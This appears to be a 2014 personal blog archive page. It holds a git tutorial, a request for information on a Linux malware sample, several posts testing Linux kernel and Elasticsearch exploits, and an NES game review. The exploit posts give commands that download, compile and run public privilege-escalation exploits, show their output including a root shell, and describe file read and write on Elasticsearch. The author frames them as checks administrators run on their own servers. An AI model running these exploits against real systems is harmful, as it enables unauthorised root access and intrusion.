Saturday, August 16, 2014

how to push branch work to github and list unpushed git commit

Often, when we work on an issue, we branch from the master branch and start our development on that branch. However, if the branch work is never published, your co-developers cannot see the changes. In this article, we are going to learn how to publish the branch work to github.

You should be familiar with basic branch work in git. For example:
git branch my-branch-work
git checkout my-branch-work
# do development work here until you are ready to merge to the master branch
git checkout master
git merge my-branch-work

If your current local branch is my-branch-work and you try to pull from github, you will get a message similar to the one below.
There is no tracking information for the current branch.
Please specify which branch you want to merge with.
See git-pull(1) for details

git pull <remote> <branch>

If you wish to set tracking information for this branch you can do so with:

git branch --set-upstream-to=origin/<branch> my-branch-work

That is when you should push your branch work to github. The -u flag records origin/my-branch-work as the upstream of your local branch, which is the tracking information the message above asks for.
jason@localhost:~$ git push -u origin my-branch-work
Username for 'https://github.com': xxxxxx
Password for 'https://xxxxxx@github.com':
Total 0 (delta 0), reused 0 (delta 0)
To https://github.com/organization/myproject.git
* [new branch] my-branch-work -> my-branch-work
Branch my-branch-work set up to track remote branch my-branch-work from origin.

Then make sure your local checkout is on the correct branch:
$ git branch
* my-branch-work
master

The next time you do git pull, you will not receive the error. When you want to push further branch changes to github, use this command:
$ git push origin my-branch-work
Username for 'https://github.com': xxxxxx
Password for 'https://xxxxxx@github.com':
Counting objects: 10, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (7/7), done.
Writing objects: 100% (10/10), 2.73 KiB | 0 bytes/s, done.
Total 10 (delta 3), reused 0 (delta 0)
To https://github.com/organization/myproject.git
954be4a..5c1bcb6 my-branch-work -> my-branch-work

Often, you commit locally and carry on developing, then pause for a while because of other priorities. When you come back and run git status, you notice that there are local commits you never pushed, but you have forgotten what is actually in them. So is there a way to view them?
$ git status
On branch master
Your branch is ahead of 'origin/master' by 2 commits.
(use "git push" to publish your local commits)

Yes, there is: a command like git log origin/master..HEAD lists exactly the commits that are on your local HEAD but not yet on origin/master.

Another helpful command is git diff origin/master..HEAD, which shows the actual changes contained in those unpushed commits.
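The whole workflow of this post in one runnable script, added here as an example and not part of the original article: a throwaway bare repository stands in for github, a branch is published once with -u, and the same log range is then used to list the commits that were never pushed. Repository paths, author identity and commit messages are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original post): publish a branch with
# `git push -u`, then list the commits that exist locally but were never
# pushed. Everything below is constructed; only git itself is required.
set -e

WORK=$(mktemp -d)
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.com

# 1. A bare repository stands in for https://github.com/organization/myproject.git
git init -q --bare "$WORK/origin.git"

# 2. Clone it, seed master, and push master so that origin/master exists
git clone -q "$WORK/origin.git" "$WORK/clone" 2>/dev/null
cd "$WORK/clone"
git symbolic-ref HEAD refs/heads/master   # use the branch name the post uses
echo base > README && git add README && git commit -q -m "initial"
git push -q origin master

# 3. Branch work, published once with -u so tracking information is recorded
git checkout -q -b my-branch-work
echo one > feature && git add feature && git commit -q -m "feature: part 1"
git push -q -u origin my-branch-work

# 4. Two more local commits that are deliberately never pushed
echo two >> feature && git commit -q -am "feature: part 2"
echo three >> feature && git commit -q -am "feature: part 3"

# Commits on HEAD that the upstream branch does not have yet
# (same idea as `git log origin/master..HEAD`, written against the
# recorded upstream so it works on any tracked branch)
unpushed_commits() {
    git log --oneline "@{u}..HEAD"
}

# The same range, counted; 0 means everything is published
unpushed_count() {
    git rev-list --count "@{u}..HEAD"
}

# Name of the upstream branch, empty when no tracking information exists
upstream_of_head() {
    git rev-parse --abbrev-ref --symbolic-full-name "@{u}" 2>/dev/null || true
}

echo "upstream: $(upstream_of_head)"
unpushed_commits
```

Run on a branch with no upstream, upstream_of_head prints nothing, which is the situation that produced the "no tracking information" message quoted above.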

That's it, I hope you like it and you can donate via our donation page. Thank you.

Friday, August 15, 2014

information for malware Linux_time_y_2014 and Linux_time_y_2015 is needed

This article is a bit special. It is more about seeking information and documenting it. If you have this type of information, please leave a comment below.

If you have noticed that any of the following files exist on your system

  • Linux_time_y_2014

  • Linux_time_y_2015 or xudp

  • .E7739C9DFEAC5B8A69A114E45AB327D41 or mysql1.0

  • .E7739C9DFEAC5B8A69A114E45AB327D4 or mysql1s


then these are malware: if one has been uploaded or copied to your server, check whether it is running on the system and remove it if it is.

I googled and searched social sites, and there is not much information beyond identifying these as malware. If you happen to know which CVE is involved or where the source is, please kindly leave a message in the comments.

The intention is to understand what this malware does other than launching DDoS attacks, to document it here, and to provide information to others who seek more. If you know how to dissect this binary and analyze its contents, please do share as well.

Thank you.

Sunday, August 3, 2014

CVE-2014-0196 kernel: pty layer race condition leading to memory corruption

First off, I would like to state that the intention of this article is to protect and safeguard administrators and developers who make a living for their families by maintaining computer systems for a company. This blog is to make those who run the Linux operating system aware of this issue, so that you can protect against malicious attacks. I take no responsibility if you and/or other evil-minded people use this to damage others.

The source is written in C and requires some understanding of Linux systems as well. You should find an explanation of the source cve-2014-0196-md.c here. If you run an old system, you might want to read further. But check the kernel that comes with your distribution; it may already have been fixed.

From the description:

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.

Okay, let's move on to compile and test it out.
user@localhost:~$ wget -O cve-2014-0196-md.c http://bugfuzz.com/stuff/cve-2014-0196-md.c
user@localhost:~$ gcc cve-2014-0196-md.c -lutil -lpthread
user@localhost:~$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105bb28
[+] Resolved prepare_kernel_cred: 0xffffffff8105bd3b
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct......
........................................................................................................................................................................................................................................................................................................................................................................................................................^C

Apparently this kernel is not vulnerable to this exploit. Another great day. :-)

Saturday, August 2, 2014

CVE-2012-0056 mempodipper

First off, I would like to state that the intention of this article is to protect and safeguard administrators and developers who make a living for their families by maintaining computer systems for a company. This blog is to make those who run the Linux operating system aware of this issue, so that you can protect against malicious attacks. I take no responsibility if you and/or other evil-minded people use this to damage others.

The source is written in C and requires some understanding of Linux systems as well. You should find an explanation of the source mempodipper.c here. It has since been fixed in this patch, so all distributions should have the fix in their kernel anyway. But in case you run an old system with kernel 2.6.39 or a non-stock kernel, you might want to read further.

With that said, let's download this source and compile it.
user@localhost:~$ wget http://www.exploit-db.com/download/18411 -O 18411.c
--2014-07-19 16:52:59-- http://www.exploit-db.com/download/18411
Resolving www.exploit-db.com (www.exploit-db.com)... 192.99.12.218, 198.58.102.135
Connecting to www.exploit-db.com (www.exploit-db.com)|192.99.12.218|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/18411/ [following]
--2014-07-19 16:53:00-- http://www.exploit-db.com/download/18411/
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 6348 (6.2K) [application/txt]
Saving to: ‘18411.c’

100%[====================================================================================================================>] 6,348 --.-K/s in 0.001s

2014-07-19 16:53:00 (7.31 MB/s) - ‘18411.c’ saved [6348/6348]

user@localhost:~$ gcc 18411.c -o 18411
user@localhost:~$ ./18411
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7398/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x4022c0.
[+] Calculating su padding.
[+] Seeking to offset 0x4022a6.
[+] Executing su with shellcode.
^C
user@localhost:~$ whoami
user

So we have downloaded the source, compiled it using gcc and run it. As you can see in the video, if the kernel is vulnerable to this exploit, the exploit finishes successfully and, after the command whoami, root is shown. But in the example above my kernel was compiled with the fix, so the system is safe. You can copy this program to the server you want to check, to make sure the exploit does not run successfully there.

That's it for this article, I hope you enjoy this writing.

Friday, August 1, 2014

CVE-2014-3120 Elastic Search Remote Code Execution

First off, I would like to state that the intention of this article is to protect and safeguard administrators and developers who use an elasticsearch cluster in their production system to make a living for their families. This blog is to make those who deploy an elasticsearch cluster aware of this issue, so that you can protect against malicious attacks. I take no responsibility if you and/or other evil-minded people use this to damage others.

To quickly fix this issue, add
script.disable_dynamic: true

to your elasticsearch.yaml configuration file and restart the elasticsearch instance.

Note that disable_dynamic defaults to false in elasticsearch version 1.1.2 and below, but to true after 1.2.0.
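A small audit script for that setting, added here as an example (not part of the original post or of elasticsearch): it reads a configuration file, takes an explicit script.disable_dynamic value when present, and otherwise applies the version default stated above, treating 1.2.0 itself as already defaulting to true (an assumption). The config files and paths are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post: decide whether dynamic
# scripting (CVE-2014-3120) is effectively enabled for a given config file
# and elasticsearch version. Defaults follow the post: false up to 1.1.2,
# true from 1.2.0 (the 1.2.0 boundary itself is an assumption).

# Print the effective value of script.disable_dynamic ("true" / "false" / other).
# An explicit, uncommented setting in the file wins; else the version default.
effective_disable_dynamic() {   # args: config file, elasticsearch version
    cfg=$1; ver=$2
    # last uncommented "script.disable_dynamic: <value>" line in the file
    val=$(sed -n 's/^[[:space:]]*script\.disable_dynamic[[:space:]]*:[[:space:]]*\([A-Za-z]*\).*$/\1/p' "$cfg" | tail -n 1)
    if [ -n "$val" ]; then
        echo "$val" | tr 'A-Z' 'a-z'
        return 0
    fi
    case "$ver" in
        0.*|1.0.*|1.1.*) echo false ;;   # 1.1.2 and below: scripting exposed
        *)               echo true  ;;   # 1.2.0 and later (assumed)
    esac
}

# Succeeds (exit 0) when the node is exposed, i.e. dynamic scripting is on.
scripting_exposed() {   # args: config file, elasticsearch version
    [ "$(effective_disable_dynamic "$1" "$2")" = "false" ]
}

# Two constructed config files: one left at the old default, one fixed.
TMP=$(mktemp -d)
cat > "$TMP/weak.yml" <<'EOF'
cluster.name: demo
# script.disable_dynamic: true   <- commented out, so it has no effect
EOF
cat > "$TMP/fixed.yml" <<'EOF'
cluster.name: demo
script.disable_dynamic: true
EOF

for f in weak fixed; do
    printf '%s on 1.1.2: disable_dynamic=%s\n' "$f" \
        "$(effective_disable_dynamic "$TMP/$f.yml" 1.1.2)"
done
```

Blocking port 9200 from untrusted networks is the second half of the fix the post describes; this script only covers the configuration half.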

Just load this html file CVE-2014-3120 in your browser, then change the "ES_IP_Address" field and the "File to read/append to" field. If your ES allows access via port 9200, it will show the file content; but if you have blocked the port and disabled dynamic scripting, then you are safe.

If the file content is shown, then writing to it is possible as well; you need to change the html source to allow writes. When that happens, an attacker will be able to gain access to your box using a public/private key. That's not good!

The said html file is an adaptation of http://www.exploit-db.com/exploits/33370/; if you are interested in reading more, please follow this link.

Friday, July 25, 2014

CVE-2010-3081 Ac1dB1tch3z

First off, I would like to state that the intention of this article is to protect and safeguard administrators and developers who make a living for their families by maintaining computer systems for a company. This blog is to make those who run the Linux operating system aware of this issue, so that you can protect against malicious attacks. I take no responsibility if you and/or other evil-minded people use this to damage others.

This exploit only works against kernel versions 2.6.26-rc1 to 2.6.36-rc4, so be alert if your production servers are running these kernels. It has since been fixed upstream, as can be found here.
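A version-range check for the three kernel advisories on this page (this one, CVE-2012-0056 and CVE-2014-0196 above), added here as an example and not taken from any of the exploit sources: it reduces a kernel release string to a sortable number and reports which quoted upstream ranges contain it. The ranges are exactly the ones stated on this page; CVE-2012-0056 is only quoted as "kernel 2.6.39", so it is matched as that single release.

```shell
#!/bin/sh
# Added example, not from the original posts: compare a kernel release
# string against the upstream version ranges quoted on this page.
# Distributions backport fixes (and bugs) without changing the version
# number, so a match means "read your distribution's errata", never proof.

# Reduce "3.14.3-rc2-generic" or "2.6.18-194.11.3.el5" to one integer so
# that releases compare with -lt / -gt. A release candidate sorts below
# its final release: rcN contributes N, a final release contributes 99.
verkey() {
    echo "$1" | awk -F'[.-]' '{
        maj = $1 + 0; min = $2 + 0; rc = 99
        pat = ($3 ~ /^[0-9]+$/) ? $3 + 0 : 0
        for (i = 3; i <= NF; i++) if ($i ~ /^rc[0-9]+$/) rc = substr($i, 3) + 0
        print ((maj * 1000 + min) * 1000 + pat) * 100 + rc
    }'
}

# in_range RELEASE LOW HIGH: succeeds when LOW <= RELEASE <= HIGH
in_range() {
    r=$(verkey "$1"); lo=$(verkey "$2"); hi=$(verkey "$3")
    [ "$r" -ge "$lo" ] && [ "$r" -le "$hi" ]
}

# Print one line per advisory whose quoted upstream range contains RELEASE.
# CVE-2012-0056 is quoted on the page only as "kernel 2.6.39", so it is
# matched as that single release.
check_release() {
    rel=$1
    in_range "$rel" 2.6.26-rc1 2.6.36-rc4 && echo "CVE-2010-3081 (2.6.26-rc1 .. 2.6.36-rc4)"
    in_range "$rel" 2.6.39 2.6.39       && echo "CVE-2012-0056 (2.6.39)"
    in_range "$rel" 0 3.14.3            && echo "CVE-2014-0196 (through 3.14.3)"
    return 0
}

check_release "$(uname -r)"
```

Run against the Red Hat release from the session below (2.6.18-194.11.3.el5), the check reports nothing for CVE-2010-3081, yet that session ends as root because the affected code had been backported into the vendor kernel. That is exactly why an upstream version check is a starting point, not a verdict.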

So what is this exploit about?

A vulnerability in the 32-bit compatibility layer for 64-bit systems was reported. It is caused by insecure allocation of user space memory when translating system call inputs to 64-bit. A stack pointer underflow can occur when using the "compat_alloc_user_space" method inside arch/x86/include/asm/compat.h with an arbitrary length input.

or read the longer descriptions here and here.

Get the source here and compile it.
user@localhost:~$ gcc -m32 15024.c -o 15024
user@localhost:~$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!

If the kernel is vulnerable to this exploit, the output looks like the session below.
[bob@xxx ~]$ date
Sun Sep 19 18:22:38 BRT 2010
[bob@xxx ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
[bob@xxx ~]$ uname -a
Linux xxx 2.6.18-194.11.3.el5 #1 SMP Mon Aug 23 15:51:38 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[bob@xxx ~]$ id
uid=500(bob) gid=500(bob) groups=500(bob)
[bob@xxx ~]$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.11.3.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=500(bob) groups=500(bob)

That's it! Stay safe.

Wednesday, July 23, 2014

Retro Dude Review: Power Blade



Let's go back in time. This time we are counting 1991, only one year prior to the great SNES release in Europe. There was a game developed by Natsume, published by Taito, known in Japan only as Power Blazer, but to many others around the world as Power Blade. It had action, it had a super master computer, it had explosions everywhere, boomerangs, powerups, burgers and a kickass soundtrack that still to this day amazes me with its pure awesomeness. (https://www.youtube.com/watch?v=WPoIwNn4-2U) The graphics were almost unheard of and my little six-year-old mind was blown to pieces.

(Insert corny picture with sister below)

The game starts you out at the intro screen (duh) where you get the option to either start the game in normal or Expert mode, or continue using a code gotten from previous levels. But you gotta pick fast, and I do mean fast, because it takes the intro sequence literally two seconds to start.

During the intro you get the backstory of the game.

In the year 2191 the earth has left all of its power in the hands of the infamous Master Computer and is now living under Terminator/Skynet-like control, and like in the not so related movie the machines decide that there is no longer any need for humans, go haywire and try to take over the world.

It's now up to you, Nova the security chief, to set things right. You are told by your boss to go out and search the 6 sectors to find the agents that are holding security keys (one agent and key per sector) to unlock the doors that hold the defence robots that protect the Master Computer located in Sector 7, all while you watch your ass, or backside, since this is a NES release and we don't want any swearing.


You push start and then you get to the sector select screen. Luckily they made this game like Megaman, so you get to choose which sector you want to start out in. The only one locked is Sector 7, since that is the one you are trying to get access to. So let's talk about stages. The first stage starts you off at the bottom of a space rocket that you have to climb to get to the boss and agent. It's pretty straightforward actually. Word of advice at the beginning of the stage: when you climb up the first ladder you can jump down on the platform to your right to get the awesome powerup. It will give you an android-like appearance and a super weapon. Like I said, when you get to the top you reach the first Defence robot, or the Boss, if you prefer that term.


Now let it be said that even though the graphics are awesome, the sound is epic 8-bit art and the stages are extremely well thought out, it's all just too easy and you won't run into too many problems anywhere in the game, especially with the first boss. It's this white robot with a big gun that doesn't do much of anything. He shoots his gun, goes right, left and jumps over you. That might sound hard, but everything he does is like in slow motion and it's way too easy to predict his moves. Besides, by the time you reach him you have all the powerups, and as long as you remember to dodge his slow-motion, small, wannabe bullets you will be just fine. You win the stage, get to the mainframe, turn it off and you continue to the level select screen.



The second stage is windmill heaven for some reason, but as a Dane I can't stop smiling about that one. And here is where the whole maze-like stage design sets in. If you have a little jump skill the stage is rather easy, but I don't wanna spoil the game too much; it's better you play it yourself. Just let me tell you this: there will be waterfalls, gears, the windmills, slugs and frogs that explode for some odd reason I still need to figure out. The boss is a dragon robot that transforms into a fire spiral, and it puts up some challenge until you figure out its pattern. It also shoots fireballs, but just dodge those and you will be fine.


That gets us to Sector 3. How to explain this one I have no idea, since its background changes to everything from a futuristic look and a swamp-like appearance to some sort of lava-melting, moss thingy. It is all basically just a little disturbing to say the least, and to top it all off the boss is a freaking robot bee hive. I mean, what the fuck were they thinking here? I don't even know. It puzzles my mind even to this day.


Now Sector 4 is a half-built skyscraper if anything, and it can be tricky to get the hang of. Just make sure you get to the freezer room before you attempt the high climb towards the top of the building and you should be fine. The only real tough spot to speak of is where you gotta jump from these moving platforms, where one mistake will send you hurtling down to the ground, and nobody wants to clean up after that mess. The boss is this wannabe Thor the thunder robot god, and it is hard to tell the difference, right?


Well maybe not that much, and what is with the finger? Is he an E.T. or a thunder god? Either way, ouch.


And that brings us up to Sector 5. Sector 5 has always, for some reason, been my favorite level in the game. The maze effect isn't really an issue here and almost the entire level is played out on an orange ship. The boss is this genie-like robot (and I don't mean the cute Disney kind) that disappears and pops up again at random while shooting bullets in all directions, and even though it's my favorite level there isn't really much else to say about it.


Sector 6 takes place in a straight line with the city in the background. You can get into the sewers below by the ladders spread out on the road. Then you reach the main building, which just reminds you once again of the mazes that are in this game. The boss is this huge android guy surrounded by platforms that appear and disappear like in Megaman.



And then we have Sector 7, the last and final stage in the game. Now since this is the final stage I won't tell you anything about it, since I don't like too many spoilers in my everyday life, so why should you? That is also the reason I have left out many things yet to be said about this game. All I will say is this.


If there ever were an all-time favorite for the NES in my heart, it will always be and always has been Power Blade. The graphics are awesome, the soundtrack I can still listen to with great joy in my heart, and the gameplay is solid. The only bad thing to say about this game is that it is too easy! You can complete it in 30 minutes or less if you have done it before. Even the expert mode doesn't leave you with much, since the difficulty is the same; the only difference is that the time you have to complete the stages is 350 seconds instead of 999 seconds. But that is all I'm going to say about this game. I'm going back to my controller to enjoy my childhood one more time.


Retro Dude saying goodbye and I do hope you get a chance on playing an instant classic!



Sadly this time alone ;)